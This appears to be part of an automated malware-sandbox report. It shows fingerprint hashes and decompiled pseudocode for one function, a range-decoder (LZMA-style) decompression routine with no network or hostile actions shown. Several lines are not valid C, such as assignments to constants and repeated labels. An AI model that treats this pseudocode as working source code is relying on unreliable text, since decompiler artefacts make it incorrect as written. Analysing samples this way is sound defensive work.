                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                                • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
